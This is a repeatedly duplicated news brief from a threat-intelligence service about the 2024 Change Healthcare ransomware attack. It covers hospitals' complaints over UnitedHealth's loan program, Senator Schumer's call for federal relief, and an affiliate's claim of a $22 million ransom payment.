<p>“Indeed, we have heard from some hospitals and health systems that these simply are not terms they can accept, especially when their financial future becomes more unpredictable the longer Change Healthcare is unavailable,” he said. As McMahon pointed out, UnitedHealth Group last year brought in more than $370 billion in revenue and $22 billion in profit. A company spokesperson did not address the AHA’s criticism of the program.</p>
<p>As providers raise the alarm about cash shortfalls, Senator Chuck Schumer (D-NY) continued calling for action from the federal government. On 4 March during a visit to a hospital, he called on the Centers for Medicare and Medicaid Services to provide advanced payments to healthcare providers struggling through the outage. The facility he was visiting, Rome Health in central New York, is reportedly incurring $2.3 million a week in losses from the cyberattack. “We need to give our hospitals the immediate relief they need so that they won’t be forced to reduce patient care,” Schumer said in a letter to the agency. “We can’t let hackers risk the financial stability of healthcare providers and even critical care to patients across America.”</p>
<p>On 3 March, someone claiming to be from a BlackCat/AlphV affiliate posted on the Ramp cybercrime forum saying that UnitedHealth Group had paid a $22 million ransom, after which the affiliate was cut out of the deal.</p>
<p>The post included a link to a Bitcoin payment address, which according to Wired received 350 bitcoin on 1 March. The address reportedly was linked to several ransomware payments in January, according to blockchain analysts.</p>
<p>In response to a request for comment about the affiliate’s claims of a ransom payment, a UnitedHealth spokesperson said: “We are focused on the investigation."</p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: https://www. redskyalliance. org/</li>
<li>Website: https://www. redskyalliance. com/</li>
<li>LinkedIn: https://www. linkedin. com/company/64265941 </li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/">https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/</a></p></div>Healthcare Hit on Rx.https://redskyalliance.org/xindustry/healthcare-hit-on-rx2024-03-07T17:20:00.000Z2024-03-07T17:20:00.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p><a href="{{#staticFileLink}}12398042262,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12398042262,RESIZE_400x{{/staticFileLink}}" width="250" alt="12398042262?profile=RESIZE_400x" /></a>The American Hospital Association is accusing the parent company of Change Healthcare, which for two weeks has dealt with a cybersecurity incident that has caused disruptions at pharmacies nationwide of failing to adequately address the issues healthcare providers face getting reimbursed for services as a result of the attack.</p>
<p>On 1 March, UnitedHealth Group, which owns Change Healthcare, rolled out a “Temporary Funding Assistance Program” for providers who rely on the company’s software to get reimbursed by health insurers. It also unveiled a new electronic prescription service, which went online that afternoon.<a href="#_ftn1">[1]</a></p>
<p>Since the incident began on 21 February, pharmacies, hospitals and other healthcare providers have been scrambling to fill prescriptions and to receive payment from insurers for care. Last week, UnitedHealth confirmed that the BlackCat/AlphV ransomware gang was behind the attack.</p>
<p>UnitedHealth’s funding assistance program offers short-term loans to affected organizations, but according to a letter Monday from AHA President Dirk McMahon it “is not even a band-aid on the payment problems.” </p>
<p>Despite the widespread nature of the outage, impacting a huge swathe of the American healthcare system, the program “is available to an exceedingly small number of hospitals and health systems,” he wrote. It addresses the difficulty of receiving payments from insurers, but not the “equally problematic issue” of providers being unable to send claims to insurance companies. “Second, the terms and conditions of the agreement are shockingly onerous,” McMahon said, requiring repayment within five days of notice, and allowing the company’s bank, Optum Financial Services, to recoup funds without notification, among other stipulations.</p>
<p>“Indeed, we have heard from some hospitals and health systems that these simply are not terms they can accept, especially when their financial future becomes more unpredictable the longer Change Healthcare is unavailable,” he said. As McMahon pointed out, UnitedHealth Group last year brought in more than $370 billion in revenue and $22 billion in profit. A company spokesperson did not address the AHA’s criticism of the program.</p>
<p>As providers raise the alarm about cash shortfalls, Senator Chuck Schumer (D-NY) continued calling for action from the federal government. On 4 March during a visit to a hospital, he called on the Centers for Medicare and Medicaid Services to provide advanced payments to healthcare providers struggling through the outage. The facility he was visiting, Rome Health in central New York, is reportedly incurring $2.3 million a week in losses from the cyberattack. “We need to give our hospitals the immediate relief they need so that they won’t be forced to reduce patient care,” Schumer said in a letter to the agency. “We can’t let hackers risk the financial stability of healthcare providers and even critical care to patients across America.”</p>
<p>On 3 March, someone claiming to be from a BlackCat/AlphV affiliate posted on the Ramp cybercrime forum saying that UnitedHealth Group had paid a $22 million ransom, after which the affiliate was cut out of the deal.</p>
<p>The post included a link to a Bitcoin payment address, which according to Wired received 350 bitcoin on 1 March. The address reportedly was linked to several ransomware payments in January, according to blockchain analysts.</p>
<p>In response to a request for comment about the affiliate’s claims of a ransom payment, a UnitedHealth spokesperson said: “We are focused on the investigation."</p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: https://www. redskyalliance. org/</li>
<li>Website: https://www. redskyalliance. com/</li>
<li>LinkedIn: https://www. linkedin. com/company/64265941 </li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/">https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/</a></p></div>Healthcare Hit on Rx.https://redskyalliance.org/xindustry/healthcare-hit-on-rx2024-03-07T17:20:00.000Z2024-03-07T17:20:00.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p><a href="{{#staticFileLink}}12398042262,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12398042262,RESIZE_400x{{/staticFileLink}}" width="250" alt="12398042262?profile=RESIZE_400x" /></a>The American Hospital Association is accusing the parent company of Change Healthcare, which for two weeks has dealt with a cybersecurity incident that has caused disruptions at pharmacies nationwide of failing to adequately address the issues healthcare providers face getting reimbursed for services as a result of the attack.</p>
<p>On 1 March, UnitedHealth Group, which owns Change Healthcare, rolled out a “Temporary Funding Assistance Program” for providers who rely on the company’s software to get reimbursed by health insurers. It also unveiled a new electronic prescription service, which went online that afternoon.<a href="#_ftn1">[1]</a></p>
<p>Since the incident began on 21 February, pharmacies, hospitals and other healthcare providers have been scrambling to fill prescriptions and to receive payment from insurers for care. Last week, UnitedHealth confirmed that the BlackCat/AlphV ransomware gang was behind the attack.</p>
<p>UnitedHealth’s funding assistance program offers short-term loans to affected organizations, but according to a letter Monday from AHA President Dirk McMahon it “is not even a band-aid on the payment problems.” </p>
<p>Despite the widespread nature of the outage, impacting a huge swathe of the American healthcare system, the program “is available to an exceedingly small number of hospitals and health systems,” he wrote. It addresses the difficulty of receiving payments from insurers, but not the “equally problematic issue” of providers being unable to send claims to insurance companies. “Second, the terms and conditions of the agreement are shockingly onerous,” McMahon said, requiring repayment within five days of notice, and allowing the company’s bank, Optum Financial Services, to recoup funds without notification, among other stipulations.</p>
<p>“Indeed, we have heard from some hospitals and health systems that these simply are not terms they can accept, especially when their financial future becomes more unpredictable the longer Change Healthcare is unavailable,” he said. As McMahon pointed out, UnitedHealth Group last year brought in more than $370 billion in revenue and $22 billion in profit. A company spokesperson did not address the AHA’s criticism of the program.</p>
<p>As providers raise the alarm about cash shortfalls, Senator Chuck Schumer (D-NY) continued calling for action from the federal government. On 4 March during a visit to a hospital, he called on the Centers for Medicare and Medicaid Services to provide advanced payments to healthcare providers struggling through the outage. The facility he was visiting, Rome Health in central New York, is reportedly incurring $2.3 million a week in losses from the cyberattack. “We need to give our hospitals the immediate relief they need so that they won’t be forced to reduce patient care,” Schumer said in a letter to the agency. “We can’t let hackers risk the financial stability of healthcare providers and even critical care to patients across America.”</p>
<p>On 3 March, someone claiming to be from a BlackCat/AlphV affiliate posted on the Ramp cybercrime forum saying that UnitedHealth Group had paid a $22 million ransom, after which the affiliate was cut out of the deal.</p>
<p>The post included a link to a Bitcoin payment address, which according to Wired received 350 bitcoin on 1 March. The address reportedly was linked to several ransomware payments in January, according to blockchain analysts.</p>
<p>In response to a request for comment about the affiliate’s claims of a ransom payment, a UnitedHealth spokesperson said: “We are focused on the investigation."</p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: https://www. redskyalliance. org/</li>
<li>Website: https://www. redskyalliance. com/</li>
<li>LinkedIn: https://www. linkedin. com/company/64265941 </li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/">https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/</a></p></div>Healthcare Hit on Rx.https://redskyalliance.org/xindustry/healthcare-hit-on-rx2024-03-07T17:20:00.000Z2024-03-07T17:20:00.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p><a href="{{#staticFileLink}}12398042262,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12398042262,RESIZE_400x{{/staticFileLink}}" width="250" alt="12398042262?profile=RESIZE_400x" /></a>The American Hospital Association is accusing the parent company of Change Healthcare, which for two weeks has dealt with a cybersecurity incident that has caused disruptions at pharmacies nationwide of failing to adequately address the issues healthcare providers face getting reimbursed for services as a result of the attack.</p>
<p>On 1 March, UnitedHealth Group, which owns Change Healthcare, rolled out a “Temporary Funding Assistance Program” for providers who rely on the company’s software to get reimbursed by health insurers. It also unveiled a new electronic prescription service, which went online that afternoon.<a href="#_ftn1">[1]</a></p>
<p>Since the incident began on 21 February, pharmacies, hospitals and other healthcare providers have been scrambling to fill prescriptions and to receive payment from insurers for care. Last week, UnitedHealth confirmed that the BlackCat/AlphV ransomware gang was behind the attack.</p>
<p>UnitedHealth’s funding assistance program offers short-term loans to affected organizations, but according to a letter Monday from AHA President Dirk McMahon it “is not even a band-aid on the payment problems.” </p>
<p>Despite the widespread nature of the outage, impacting a huge swathe of the American healthcare system, the program “is available to an exceedingly small number of hospitals and health systems,” he wrote. It addresses the difficulty of receiving payments from insurers, but not the “equally problematic issue” of providers being unable to send claims to insurance companies. “Second, the terms and conditions of the agreement are shockingly onerous,” McMahon said, requiring repayment within five days of notice, and allowing the company’s bank, Optum Financial Services, to recoup funds without notification, among other stipulations.</p>
<p>“Indeed, we have heard from some hospitals and health systems that these simply are not terms they can accept, especially when their financial future becomes more unpredictable the longer Change Healthcare is unavailable,” he said. As McMahon pointed out, UnitedHealth Group last year brought in more than $370 billion in revenue and $22 billion in profit. A company spokesperson did not address the AHA’s criticism of the program.</p>
<p>As providers raise the alarm about cash shortfalls, Senator Chuck Schumer (D-NY) continued calling for action from the federal government. On 4 March during a visit to a hospital, he called on the Centers for Medicare and Medicaid Services to provide advanced payments to healthcare providers struggling through the outage. The facility he was visiting, Rome Health in central New York, is reportedly incurring $2.3 million a week in losses from the cyberattack. “We need to give our hospitals the immediate relief they need so that they won’t be forced to reduce patient care,” Schumer said in a letter to the agency. “We can’t let hackers risk the financial stability of healthcare providers and even critical care to patients across America.”</p>
<p>On 3 March, someone claiming to be from a BlackCat/AlphV affiliate posted on the Ramp cybercrime forum saying that UnitedHealth Group had paid a $22 million ransom, after which the affiliate was cut out of the deal.</p>
<p>The post included a link to a Bitcoin payment address, which according to Wired received 350 bitcoin on 1 March. The address reportedly was linked to several ransomware payments in January, according to blockchain analysts.</p>
<p>In response to a request for comment about the affiliate’s claims of a ransom payment, a UnitedHealth spokesperson said: “We are focused on the investigation."</p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: https://www. redskyalliance. org/</li>
<li>Website: https://www. redskyalliance. com/</li>
<li>LinkedIn: https://www. linkedin. com/company/64265941 </li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/">https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/</a></p></div>Healthcare Hit on Rx.https://redskyalliance.org/xindustry/healthcare-hit-on-rx2024-03-07T17:20:00.000Z2024-03-07T17:20:00.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p><a href="{{#staticFileLink}}12398042262,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12398042262,RESIZE_400x{{/staticFileLink}}" width="250" alt="12398042262?profile=RESIZE_400x" /></a>The American Hospital Association is accusing the parent company of Change Healthcare, which for two weeks has dealt with a cybersecurity incident that has caused disruptions at pharmacies nationwide of failing to adequately address the issues healthcare providers face getting reimbursed for services as a result of the attack.</p>
<p>On 1 March, UnitedHealth Group, which owns Change Healthcare, rolled out a “Temporary Funding Assistance Program” for providers who rely on the company’s software to get reimbursed by health insurers. It also unveiled a new electronic prescription service, which went online that afternoon.<a href="#_ftn1">[1]</a></p>
<p>Since the incident began on 21 February, pharmacies, hospitals and other healthcare providers have been scrambling to fill prescriptions and to receive payment from insurers for care. Last week, UnitedHealth confirmed that the BlackCat/AlphV ransomware gang was behind the attack.</p>
<p>UnitedHealth’s funding assistance program offers short-term loans to affected organizations, but according to a letter Monday from AHA President Dirk McMahon it “is not even a band-aid on the payment problems.” </p>
<p>Despite the widespread nature of the outage, impacting a huge swathe of the American healthcare system, the program “is available to an exceedingly small number of hospitals and health systems,” he wrote. It addresses the difficulty of receiving payments from insurers, but not the “equally problematic issue” of providers being unable to send claims to insurance companies. “Second, the terms and conditions of the agreement are shockingly onerous,” McMahon said, requiring repayment within five days of notice, and allowing the company’s bank, Optum Financial Services, to recoup funds without notification, among other stipulations.</p>
<p>“Indeed, we have heard from some hospitals and health systems that these simply are not terms they can accept, especially when their financial future becomes more unpredictable the longer Change Healthcare is unavailable,” he said. As McMahon pointed out, UnitedHealth Group last year brought in more than $370 billion in revenue and $22 billion in profit. A company spokesperson did not address the AHA’s criticism of the program.</p>
<p>As providers raise the alarm about cash shortfalls, Senator Chuck Schumer (D-NY) continued calling for action from the federal government. On 4 March during a visit to a hospital, he called on the Centers for Medicare and Medicaid Services to provide advanced payments to healthcare providers struggling through the outage. The facility he was visiting, Rome Health in central New York, is reportedly incurring $2.3 million a week in losses from the cyberattack. “We need to give our hospitals the immediate relief they need so that they won’t be forced to reduce patient care,” Schumer said in a letter to the agency. “We can’t let hackers risk the financial stability of healthcare providers and even critical care to patients across America.”</p>
<p>On 3 March, someone claiming to be from a BlackCat/AlphV affiliate posted on the Ramp cybercrime forum saying that UnitedHealth Group had paid a $22 million ransom, after which the affiliate was cut out of the deal.</p>
<p>The post included a link to a Bitcoin payment address, which according to Wired received 350 bitcoin on 1 March. The address reportedly was linked to several ransomware payments in January, according to blockchain analysts.</p>
<p>In response to a request for comment about the affiliate’s claims of a ransom payment, a UnitedHealth spokesperson said: “We are focused on the investigation."</p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: https://www. redskyalliance. org/</li>
<li>Website: https://www. redskyalliance. com/</li>
<li>LinkedIn: https://www. linkedin. com/company/64265941 </li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/">https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/</a></p></div>Healthcare Hit on Rx.https://redskyalliance.org/xindustry/healthcare-hit-on-rx2024-03-07T17:20:00.000Z2024-03-07T17:20:00.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p><a href="{{#staticFileLink}}12398042262,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12398042262,RESIZE_400x{{/staticFileLink}}" width="250" alt="12398042262?profile=RESIZE_400x" /></a>The American Hospital Association is accusing the parent company of Change Healthcare, which for two weeks has dealt with a cybersecurity incident that has caused disruptions at pharmacies nationwide of failing to adequately address the issues healthcare providers face getting reimbursed for services as a result of the attack.</p>
<p>On 1 March, UnitedHealth Group, which owns Change Healthcare, rolled out a “Temporary Funding Assistance Program” for providers who rely on the company’s software to get reimbursed by health insurers. It also unveiled a new electronic prescription service, which went online that afternoon.<a href="#_ftn1">[1]</a></p>
<p>Since the incident began on 21 February, pharmacies, hospitals and other healthcare providers have been scrambling to fill prescriptions and to receive payment from insurers for care. Last week, UnitedHealth confirmed that the BlackCat/AlphV ransomware gang was behind the attack.</p>
<p>UnitedHealth’s funding assistance program offers short-term loans to affected organizations, but according to a letter Monday from AHA President Dirk McMahon it “is not even a band-aid on the payment problems.” </p>
<p>Despite the widespread nature of the outage, impacting a huge swathe of the American healthcare system, the program “is available to an exceedingly small number of hospitals and health systems,” he wrote. It addresses the difficulty of receiving payments from insurers, but not the “equally problematic issue” of providers being unable to send claims to insurance companies. “Second, the terms and conditions of the agreement are shockingly onerous,” McMahon said, requiring repayment within five days of notice, and allowing the company’s bank, Optum Financial Services, to recoup funds without notification, among other stipulations.</p>
<p>“Indeed, we have heard from some hospitals and health systems that these simply are not terms they can accept, especially when their financial future becomes more unpredictable the longer Change Healthcare is unavailable,” he said. As McMahon pointed out, UnitedHealth Group last year brought in more than $370 billion in revenue and $22 billion in profit. A company spokesperson did not address the AHA’s criticism of the program.</p>
<p>As providers raise the alarm about cash shortfalls, Senator Chuck Schumer (D-NY) continued calling for action from the federal government. On 4 March during a visit to a hospital, he called on the Centers for Medicare and Medicaid Services to provide advanced payments to healthcare providers struggling through the outage. The facility he was visiting, Rome Health in central New York, is reportedly incurring $2.3 million a week in losses from the cyberattack. “We need to give our hospitals the immediate relief they need so that they won’t be forced to reduce patient care,” Schumer said in a letter to the agency. “We can’t let hackers risk the financial stability of healthcare providers and even critical care to patients across America.”</p>
<p>On 3 March, someone claiming to be from a BlackCat/AlphV affiliate posted on the Ramp cybercrime forum saying that UnitedHealth Group had paid a $22 million ransom, after which the affiliate was cut out of the deal.</p>
<p>The post included a link to a Bitcoin payment address, which according to Wired received 350 bitcoin on 1 March. The address reportedly was linked to several ransomware payments in January, according to blockchain analysts.</p>
<p>In response to a request for comment about the affiliate’s claims of a ransom payment, a UnitedHealth spokesperson said: “We are focused on the investigation."</p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: https://www. redskyalliance. org/</li>
<li>Website: https://www. redskyalliance. com/</li>
<li>LinkedIn: https://www. linkedin. com/company/64265941 </li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/">https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/</a></p></div>Healthcare Hit on Rx.https://redskyalliance.org/xindustry/healthcare-hit-on-rx2024-03-07T17:20:00.000Z2024-03-07T17:20:00.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p><a href="{{#staticFileLink}}12398042262,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12398042262,RESIZE_400x{{/staticFileLink}}" width="250" alt="12398042262?profile=RESIZE_400x" /></a>The American Hospital Association is accusing the parent company of Change Healthcare, which for two weeks has dealt with a cybersecurity incident that has caused disruptions at pharmacies nationwide of failing to adequately address the issues healthcare providers face getting reimbursed for services as a result of the attack.</p>
<p>On 1 March, UnitedHealth Group, which owns Change Healthcare, rolled out a “Temporary Funding Assistance Program” for providers who rely on the company’s software to get reimbursed by health insurers. It also unveiled a new electronic prescription service, which went online that afternoon.<a href="#_ftn1">[1]</a></p>
<p>Since the incident began on 21 February, pharmacies, hospitals and other healthcare providers have been scrambling to fill prescriptions and to receive payment from insurers for care. Last week, UnitedHealth confirmed that the BlackCat/AlphV ransomware gang was behind the attack.</p>
<p>UnitedHealth’s funding assistance program offers short-term loans to affected organizations, but according to a letter Monday from AHA President Dirk McMahon it “is not even a band-aid on the payment problems.” </p>
<p>Despite the widespread nature of the outage, impacting a huge swathe of the American healthcare system, the program “is available to an exceedingly small number of hospitals and health systems,” he wrote. It addresses the difficulty of receiving payments from insurers, but not the “equally problematic issue” of providers being unable to send claims to insurance companies. “Second, the terms and conditions of the agreement are shockingly onerous,” McMahon said, requiring repayment within five days of notice, and allowing the company’s bank, Optum Financial Services, to recoup funds without notification, among other stipulations.</p>
<p>“Indeed, we have heard from some hospitals and health systems that these simply are not terms they can accept, especially when their financial future becomes more unpredictable the longer Change Healthcare is unavailable,” he said. As McMahon pointed out, UnitedHealth Group last year brought in more than $370 billion in revenue and $22 billion in profit. A company spokesperson did not address the AHA’s criticism of the program.</p>
<p>As providers raise the alarm about cash shortfalls, Senator Chuck Schumer (D-NY) continued calling for action from the federal government. On 4 March during a visit to a hospital, he called on the Centers for Medicare and Medicaid Services to provide advanced payments to healthcare providers struggling through the outage. The facility he was visiting, Rome Health in central New York, is reportedly incurring $2.3 million a week in losses from the cyberattack. “We need to give our hospitals the immediate relief they need so that they won’t be forced to reduce patient care,” Schumer said in a letter to the agency. “We can’t let hackers risk the financial stability of healthcare providers and even critical care to patients across America.”</p>
<p>On 3 March, someone claiming to be from a BlackCat/AlphV affiliate posted on the Ramp cybercrime forum saying that UnitedHealth Group had paid a $22 million ransom, after which the affiliate was cut out of the deal.</p>
<p>The post included a link to a Bitcoin payment address, which according to Wired received 350 bitcoin on 1 March. The address reportedly was linked to several ransomware payments in January, according to blockchain analysts.</p>
<p>In response to a request for comment about the affiliate’s claims of a ransom payment, a UnitedHealth spokesperson said: “We are focused on the investigation."</p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: https://www. redskyalliance. org/</li>
<li>Website: https://www. redskyalliance. com/</li>
<li>LinkedIn: https://www. linkedin. com/company/64265941 </li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/">https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/</a></p></div>Healthcare Hit on Rx.https://redskyalliance.org/xindustry/healthcare-hit-on-rx2024-03-07T17:20:00.000Z2024-03-07T17:20:00.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p><a href="{{#staticFileLink}}12398042262,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12398042262,RESIZE_400x{{/staticFileLink}}" width="250" alt="12398042262?profile=RESIZE_400x" /></a>The American Hospital Association is accusing the parent company of Change Healthcare, which for two weeks has dealt with a cybersecurity incident that has caused disruptions at pharmacies nationwide of failing to adequately address the issues healthcare providers face getting reimbursed for services as a result of the attack.</p>
<p>On 1 March, UnitedHealth Group, which owns Change Healthcare, rolled out a “Temporary Funding Assistance Program” for providers who rely on the company’s software to get reimbursed by health insurers. It also unveiled a new electronic prescription service, which went online that afternoon.<a href="#_ftn1">[1]</a></p>
<p>Since the incident began on 21 February, pharmacies, hospitals and other healthcare providers have been scrambling to fill prescriptions and to receive payment from insurers for care. Last week, UnitedHealth confirmed that the BlackCat/AlphV ransomware gang was behind the attack.</p>
<p>UnitedHealth’s funding assistance program offers short-term loans to affected organizations, but according to a letter Monday from AHA President Dirk McMahon it “is not even a band-aid on the payment problems.” </p>
<p>Despite the widespread nature of the outage, impacting a huge swathe of the American healthcare system, the program “is available to an exceedingly small number of hospitals and health systems,” he wrote. It addresses the difficulty of receiving payments from insurers, but not the “equally problematic issue” of providers being unable to send claims to insurance companies. “Second, the terms and conditions of the agreement are shockingly onerous,” McMahon said, requiring repayment within five days of notice, and allowing the company’s bank, Optum Financial Services, to recoup funds without notification, among other stipulations.</p>
<p>“Indeed, we have heard from some hospitals and health systems that these simply are not terms they can accept, especially when their financial future becomes more unpredictable the longer Change Healthcare is unavailable,” he said. As McMahon pointed out, UnitedHealth Group last year brought in more than $370 billion in revenue and $22 billion in profit. A company spokesperson did not address the AHA’s criticism of the program.</p>
<p>As providers raise the alarm about cash shortfalls, Senator Chuck Schumer (D-NY) continued calling for action from the federal government. On 4 March during a visit to a hospital, he called on the Centers for Medicare and Medicaid Services to provide advanced payments to healthcare providers struggling through the outage. The facility he was visiting, Rome Health in central New York, is reportedly incurring $2.3 million a week in losses from the cyberattack. “We need to give our hospitals the immediate relief they need so that they won’t be forced to reduce patient care,” Schumer said in a letter to the agency. “We can’t let hackers risk the financial stability of healthcare providers and even critical care to patients across America.”</p>
<p>On 3 March, someone claiming to be from a BlackCat/AlphV affiliate posted on the Ramp cybercrime forum saying that UnitedHealth Group had paid a $22 million ransom, after which the affiliate was cut out of the deal.</p>
<p>The post included a link to a Bitcoin payment address, which according to Wired received 350 bitcoin on 1 March. The address reportedly was linked to several ransomware payments in January, according to blockchain analysts.</p>
<p>In response to a request for comment about the affiliate’s claims of a ransom payment, a UnitedHealth spokesperson said: “We are focused on the investigation."</p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: https://www. redskyalliance. org/</li>
<li>Website: https://www. redskyalliance. com/</li>
<li>LinkedIn: https://www. linkedin. com/company/64265941 </li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/">https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/</a></p></div>Healthcare Hit on Rx.https://redskyalliance.org/xindustry/healthcare-hit-on-rx2024-03-07T17:20:00.000Z2024-03-07T17:20:00.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p><a href="{{#staticFileLink}}12398042262,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12398042262,RESIZE_400x{{/staticFileLink}}" width="250" alt="12398042262?profile=RESIZE_400x" /></a>The American Hospital Association is accusing the parent company of Change Healthcare, which for two weeks has dealt with a cybersecurity incident that has caused disruptions at pharmacies nationwide of failing to adequately address the issues healthcare providers face getting reimbursed for services as a result of the attack.</p>
<p>On 1 March, UnitedHealth Group, which owns Change Healthcare, rolled out a “Temporary Funding Assistance Program” for providers who rely on the company’s software to get reimbursed by health insurers. It also unveiled a new electronic prescription service, which went online that afternoon.<a href="#_ftn1">[1]</a></p>
<p>Since the incident began on 21 February, pharmacies, hospitals and other healthcare providers have been scrambling to fill prescriptions and to receive payment from insurers for care. Last week, UnitedHealth confirmed that the BlackCat/AlphV ransomware gang was behind the attack.</p>
<p>UnitedHealth’s funding assistance program offers short-term loans to affected organizations, but according to a letter Monday from AHA President Dirk McMahon it “is not even a band-aid on the payment problems.” </p>
